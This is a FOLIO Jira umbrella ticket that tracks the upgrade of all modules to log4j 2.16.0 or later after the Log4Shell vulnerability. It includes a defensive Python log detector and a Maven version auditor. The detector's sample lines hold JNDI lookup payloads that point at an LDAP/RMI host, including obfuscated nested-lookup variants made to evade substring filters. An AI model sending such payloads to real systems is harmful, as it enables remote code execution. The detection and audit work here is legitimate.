[FOLIO-3364] Update everything to log4j >= 2.16.0 fixing remote execution (CVE-2021-44228) Created: 10/Dec/21  Updated: 20/Jan/22  Resolved: 20/Jan/22

Status: Closed
Project: FOLIO
Components: None
Affects versions: None
Fix versions: None

Type: Umbrella Priority: TBD
Reporter: Julian Ladisch Assignee: Unassigned
Resolution: Done Votes: 0
Labels: security
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original estimate: Not Specified

Issue links:
Defines
defines SECURITY-6 Log4j vulnerability CVE-2021-44228 is ... Completed
is defined by EDGCOMMON-38 Upgrade to log4j to 2.16.0, Vert.x 4.2.2 Closed
is defined by MODAT-113 Log4j 2.15.0 fixing remote execution ... Closed
is defined by MODCONF-98 RMB 33.2.1, Vert.x 4.2.1, Log4j 2.15.... Closed
is defined by MODLOGIN-172 RMB 33.2.1, Vertx 4.2.1, Log4j 2.15.0... Closed
is defined by MODLOGSAML-124 RMB 33.2.1, Vertx 4.2.1, Log4j 2.15.0... Closed
is defined by MODPERMS-167 RMB 33.2.1, Vertx 4.2.1, Log4j 2.15.0... Closed
is defined by MODUIMP-58 Log4j 2.15.0 fixing remote execution ... Closed
is defined by OKAPI-1046 Log4j 2.15.0 fixing remote execution ... Closed
is defined by OKAPI-1050 -Dlog4j2.formatMsgNoLookups=true for ... Closed
is defined by RMB-888 Log4j 2.15.0 fixing remote execution ... Closed
is defined by VERTXLIB-6 Log4j 2.15.0 fixing remote execution ... Closed
Relates
relates to FOLIO-3363 Update reference deployments in light... Closed
Sprint:
Development Team: None

 Description   

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Apache Log4j2 <= 2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters (for example a request header that a module logs verbatim) can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Log4j 2.15.0 disabled message lookups by default, but that fix was later found to be incomplete (CVE-2021-45046); Log4j 2.16.0 removes message lookup support entirely and disables JNDI access by default, which is why this umbrella targets 2.16.0 rather than 2.15.0.
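
The following is an added example, not code from this ticket or from FOLIO: a detector that runs over constructed log lines and reports JNDI lookups of the kind described above. It resolves the lower/upper/default-value lookups attackers nest to hide the string "jndi" before matching, and contrasts that with the plain substring check that misses them. The sample lines, hosts and paths are invented.

```python
import re

# Constructed sample access-log lines (not from any FOLIO deployment). The
# user-agent field is attacker-controlled input that a module might log
# verbatim. Lines 2-4 carry a JNDI lookup; 3 and 4 hide the word "jndi"
# behind nested lookups so a plain substring match misses them.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /users HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.10/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/x}"',
]

# Inner lookups whose result an attacker can predict. Each pattern excludes
# "${" and "}" inside the braces, so only innermost lookups match and repeated
# passes peel the nesting from the inside out.
_LOWER = re.compile(r'\$\{lower:([^${}]*)\}', re.IGNORECASE)
_UPPER = re.compile(r'\$\{upper:([^${}]*)\}', re.IGNORECASE)
# "${key:-default}": Log4j yields the default when "key" does not resolve,
# which is how "${::-j}" or "${env:NOPE:-j}" evaluate to the single letter "j".
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
# The lookup that actually reaches out to an attacker-controlled endpoint.
_JNDI = re.compile(r'\$\{\s*jndi\s*:([^}]*)\}', re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Resolve attacker-predictable lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def naive_match(line: str) -> bool:
    """The substring check many first-day detections used; defeated by nesting."""
    return "${jndi:" in line.lower()


def find_jndi_lookups(lines):
    """Return (line_number, jndi_target) for every line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for m in _JNDI.finditer(normalize(line)):
            hits.append((number, m.group(1).strip()))
    return hits


if __name__ == "__main__":
    for number, target in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {number}: JNDI lookup -> {target}")
```

Only the lower, upper and default-value lookups are resolved here; other lookup types can be abused for the same purpose, so treat this as a starting point for log triage rather than a complete filter, and rely on the library upgrade for the actual fix.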

This umbrella Jira tracks updating all FOLIO modules to log4j >= 2.16.0.
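
As an added example that is not part of this ticket or of any FOLIO build tooling, the script below audits Maven dependency output for modules still below the 2.16.0 target. The module names, versions and dependency:list lines are constructed for illustration; the only real identifiers are the log4j Maven coordinates. It compares versions numerically (a string comparison would rank 2.9.1 above 2.16.0) and distinguishes a stale log4j-core, which carries the JNDI lookup code, from a stale log4j-api that merely falls outside the >= 2.16.0 policy.

```python
import re
from typing import Dict, Tuple

# Minimum version this umbrella requires for every log4j artifact.
FIXED_VERSION = (2, 16, 0)

# Constructed "mvn dependency:list" output, one entry per module, in the
# "group:artifact:type:version:scope" form Maven prints. Module names and
# versions are invented for illustration and do not describe real FOLIO modules.
SAMPLE_DEPENDENCY_LISTS = {
    "mod-alpha": [
        "[INFO]    org.apache.logging.log4j:log4j-api:jar:2.14.1:compile",
        "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.14.1:compile",
    ],
    "mod-beta": [   # picked up the first fix release only
        "[INFO]    org.apache.logging.log4j:log4j-api:jar:2.15.0:compile",
        "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.15.0:compile",
    ],
    "mod-gamma": [  # already where the umbrella wants it
        "[INFO]    org.apache.logging.log4j:log4j-api:jar:2.16.0:compile",
        "[INFO]    org.apache.logging.log4j:log4j-core:jar:2.16.0:compile",
    ],
    "mod-delta": [  # logs through logback; only the log4j API jar is on the classpath
        "[INFO]    org.apache.logging.log4j:log4j-api:jar:2.9.1:compile",
        "[INFO]    ch.qos.logback:logback-classic:jar:1.2.7:compile",
    ],
}

_LOG4J_DEP = re.compile(
    r"org\.apache\.logging\.log4j:(log4j-core|log4j-api):[^:]+:([0-9][^:\s]*)"
)


def parse_version(version: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1). Compare as integers: as strings, '2.9.1' would
    sort above '2.16.0' and an old module would pass the check."""
    m = re.fullmatch(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:[-.].*)?", version)
    if not m:
        raise ValueError(f"unrecognised version: {version}")
    major, minor, patch = (int(x) if x else 0 for x in m.groups())
    return (major, minor, patch)


def log4j_versions(lines) -> Dict[str, str]:
    """Map each log4j artifact found in dependency:list output to its version."""
    return {m.group(1): m.group(2) for m in map(_LOG4J_DEP.search, lines) if m}


def audit(dependency_lists) -> Dict[str, dict]:
    """Modules with any log4j artifact below FIXED_VERSION, and whether the
    stale artifact is log4j-core, which is where JndiLookup lives."""
    report = {}
    for module, lines in dependency_lists.items():
        stale = {
            artifact: version
            for artifact, version in log4j_versions(lines).items()
            if parse_version(version) < FIXED_VERSION
        }
        if stale:
            report[module] = {"stale": stale, "core_vulnerable": "log4j-core" in stale}
    return report


if __name__ == "__main__":
    for module, result in sorted(audit(SAMPLE_DEPENDENCY_LISTS).items()):
        flag = "VULNERABLE" if result["core_vulnerable"] else "policy only"
        print(f"{module}: {flag} {result['stale']}")
```

In practice the input would come from running mvn dependency:list in each module checkout; 2.15.0 is deliberately reported as stale because the umbrella's target is 2.16.0, not the first fix release.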



 Comments   
Comment by Craig McNally [ 20/Jan/22 ]

Closing this as I think the work under this umbrella has been completed.
